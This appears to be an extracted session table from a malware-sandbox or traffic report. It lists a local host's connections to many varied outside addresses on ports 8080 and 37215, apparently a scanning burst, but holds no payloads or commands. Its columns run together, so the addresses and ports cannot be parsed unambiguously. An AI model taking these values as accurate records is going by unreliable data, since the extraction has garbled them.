                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10686192.168.2.2349168204.181.201.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10687192.168.2.234706085.195.57.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10688192.168.2.2343644101.178.217.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10689192.168.2.2346232183.201.105.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10690192.168.2.235771250.0.87.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10691192.168.2.233325258.101.138.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10692192.168.2.234124251.212.73.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10693192.168.2.2352930144.235.247.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10694192.168.2.236045619.75.134.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10695192.168.2.2352642205.216.23.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10696192.168.2.233937841.52.30.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10697192.168.2.2336078172.160.168.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10698192.168.2.2348006152.236.120.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10699192.168.2.23589641.122.196.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10700192.168.2.233321218.94.143.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10701192.168.2.2350952188.120.127.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10702192.168.2.233408653.24.33.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10703192.168.2.233838227.14.165.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10704192.168.2.2343920150.138.15.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10705192.168.2.235803695.250.236.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10706192.168.2.2341196180.159.137.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10707192.168.2.2359794211.241.229.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10708192.168.2.2355660128.65.136.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10709192.168.2.23427465.235.56.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10710192.168.2.235830847.108.82.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10711192.168.2.2355126197.87.88.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10712192.168.2.2353678142.183.39.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10713192.168.2.2337882140.15.84.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10714192.168.2.234711664.136.240.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10715192.168.2.2346648177.244.244.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10716192.168.2.2345372141.42.96.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10717192.168.2.235704232.167.188.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10718192.168.2.2347682145.136.49.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10719192.168.2.2345550102.250.26.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10720192.168.2.2354958193.173.58.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10721192.168.2.233478225.60.102.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10722192.168.2.2337708126.242.6.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10723192.168.2.2360132177.211.165.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10724192.168.2.234598095.178.211.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10725192.168.2.2355880117.198.60.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10726192.168.2.2348930111.2.77.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10727192.168.2.233467898.179.240.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10728192.168.2.234729669.107.63.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10729192.168.2.2344182121.105.177.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10730192.168.2.2354340178.24.113.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10731192.168.2.2352852146.73.169.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10732192.168.2.235679049.155.25.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10733192.168.2.234214483.19.85.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10734192.168.2.235482485.0.86.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10735192.168.2.2358570124.94.136.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10736192.168.2.2352840165.158.61.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10737192.168.2.2356798186.205.121.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10738192.168.2.2358118220.136.151.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10739192.168.2.23602885.94.5.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10740192.168.2.234580248.214.112.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10741192.168.2.2351462146.214.98.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10742192.168.2.2354460165.22.241.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10743192.168.2.234751092.231.211.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10744192.168.2.233943070.73.22.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10745192.168.2.234618276.193.204.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10746192.168.2.235089451.5.165.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10747192.168.2.23572904.12.207.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10748192.168.2.2354154146.131.65.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10749192.168.2.2340714110.129.143.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10750192.168.2.2345566185.224.155.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10751192.168.2.23586341.245.66.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10752192.168.2.2346038104.138.46.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10753192.168.2.235374654.244.123.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10754192.168.2.2339700195.126.114.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10755192.168.2.2351344222.145.250.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10756192.168.2.236080288.85.93.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10757192.168.2.235595023.215.195.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10758192.168.2.2356616167.204.113.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10759192.168.2.234675412.162.128.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10760192.168.2.235518297.227.224.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10761192.168.2.2349596200.47.39.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10762192.168.2.234981620.197.121.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10763192.168.2.234368846.29.201.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10764192.168.2.2352676193.128.153.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10765192.168.2.2345230141.48.254.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10766192.168.2.234585242.1.51.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10767192.168.2.233920087.11.198.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10768192.168.2.2342756104.167.249.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10769192.168.2.2360254105.226.220.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10770192.168.2.2337718101.190.75.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10771192.168.2.2352928157.164.174.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10772192.168.2.2355516157.50.115.2837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10773192.168.2.2342122157.17.74.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10774192.168.2.2342704197.254.124.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10775192.168.2.2337278157.66.249.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10776192.168.2.233745041.129.214.6737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10777192.168.2.234729241.3.186.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10778192.168.2.233591634.225.191.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10779192.168.2.2355988197.185.255.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10780192.168.2.2350102157.240.43.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10781192.168.2.2335204157.250.164.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10782192.168.2.235270441.78.2.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10783192.168.2.235081041.95.176.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10784192.168.2.2352352213.37.35.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10785192.168.2.2356678157.158.13.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10786192.168.2.2356350191.217.200.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10787192.168.2.2354712197.202.46.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10788192.168.2.2337764168.9.227.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10789192.168.2.235947441.162.95.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10790192.168.2.235897235.124.91.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10791192.168.2.234037493.138.18.6337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10792192.168.2.233458641.155.10.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10793192.168.2.2356264197.152.151.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10794192.168.2.2352220164.158.154.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10795192.168.2.2345686205.10.253.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10796192.168.2.2359308197.19.18.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10797192.168.2.2338344157.84.238.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10798192.168.2.2359064157.202.138.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10799192.168.2.2337636197.31.173.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10800192.168.2.2356990157.151.248.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10801192.168.2.2352740197.71.212.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10802192.168.2.2360528157.217.30.9037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10803192.168.2.234273841.224.200.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10804192.168.2.2332954157.228.22.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10805192.168.2.2359692135.232.17.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10806192.168.2.233695841.213.247.20137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10807192.168.2.235842241.23.232.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10808192.168.2.2341228157.44.53.22837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10809192.168.2.2341552197.243.127.5537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10810192.168.2.2346802157.45.181.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10811192.168.2.2335850197.197.170.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10812192.168.2.2356356157.69.64.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10813192.168.2.2340984150.207.208.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10814192.168.2.2355696197.218.139.10137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10815192.168.2.2351250198.224.146.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10816192.168.2.234898650.17.180.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10817192.168.2.234763041.30.241.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10818192.168.2.2333294209.81.99.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10819192.168.2.234632041.72.27.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10820192.168.2.2335730157.210.3.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10821192.168.2.2356014157.96.84.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10822192.168.2.235393841.8.145.22237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10823192.168.2.235199241.148.193.16237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10824192.168.2.2335716157.120.172.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10825192.168.2.2338964197.200.241.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10826192.168.2.2336636197.236.58.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10827192.168.2.2352186197.43.156.18337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10828192.168.2.2350226157.6.25.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10829192.168.2.2352440197.53.162.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10830192.168.2.2359752191.57.139.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10831192.168.2.2356510157.61.4.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10832192.168.2.2358840153.140.111.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10833192.168.2.2342226105.225.30.437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10834192.168.2.235199696.204.25.5537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10835192.168.2.2358622157.123.206.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10836192.168.2.2353480125.215.220.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10837192.168.2.2333366197.134.224.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10838192.168.2.2349122197.29.46.17237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10839192.168.2.2333300197.225.6.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10840192.168.2.2338330138.147.55.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10841192.168.2.2338548221.234.91.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10842192.168.2.2342908197.92.129.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10843192.168.2.2339214150.210.176.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10844192.168.2.233426041.186.241.18637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10845192.168.2.235892095.215.164.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10846192.168.2.2356298157.169.122.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10847192.168.2.2353252166.139.152.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10848192.168.2.2344844197.155.116.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10849192.168.2.2353262197.106.9.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10850192.168.2.2357430197.144.115.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10851192.168.2.2342026197.177.249.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10852192.168.2.2352152157.184.42.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10853192.168.2.233345660.3.214.7437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10854192.168.2.2345606157.29.219.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10855192.168.2.235615096.171.61.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10856192.168.2.2356970195.66.49.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10857192.168.2.2351832157.26.208.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10858192.168.2.234859841.206.111.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10859192.168.2.2358282197.89.115.21237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10860192.168.2.235544276.255.193.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10861192.168.2.23386849.197.232.18337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10862192.168.2.2349274157.193.217.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10863192.168.2.2360254197.19.72.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10864192.168.2.234319631.170.86.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10865192.168.2.235297864.18.103.18937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10866192.168.2.234771841.176.26.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10867192.168.2.2348020157.176.62.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10868192.168.2.2337654197.10.243.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10869192.168.2.2338660157.89.74.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10870192.168.2.2345454187.196.3.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10871192.168.2.2357790157.243.72.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10872192.168.2.2352806197.74.73.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10873192.168.2.2360950105.102.65.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10874192.168.2.2338378181.17.235.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10875192.168.2.2341898197.100.219.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10876192.168.2.2349204197.166.150.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10877192.168.2.235825041.231.180.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10878192.168.2.233369431.147.92.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10879192.168.2.2349160157.107.135.5437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10880192.168.2.2356820197.8.58.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10881192.168.2.234003871.146.134.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10882192.168.2.2356226197.61.54.17837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10883192.168.2.2336500157.197.142.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10884192.168.2.234726241.7.36.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10885192.168.2.235553497.120.195.15137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10886192.168.2.2354736115.73.124.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10887192.168.2.235807631.156.192.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10888192.168.2.233283641.158.79.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10889192.168.2.2352524170.245.221.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10890192.168.2.2352008197.57.168.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10891192.168.2.2337566197.173.136.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10892192.168.2.2334028219.176.140.15137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10893192.168.2.2359302203.135.29.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10894192.168.2.2357774197.248.8.18337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
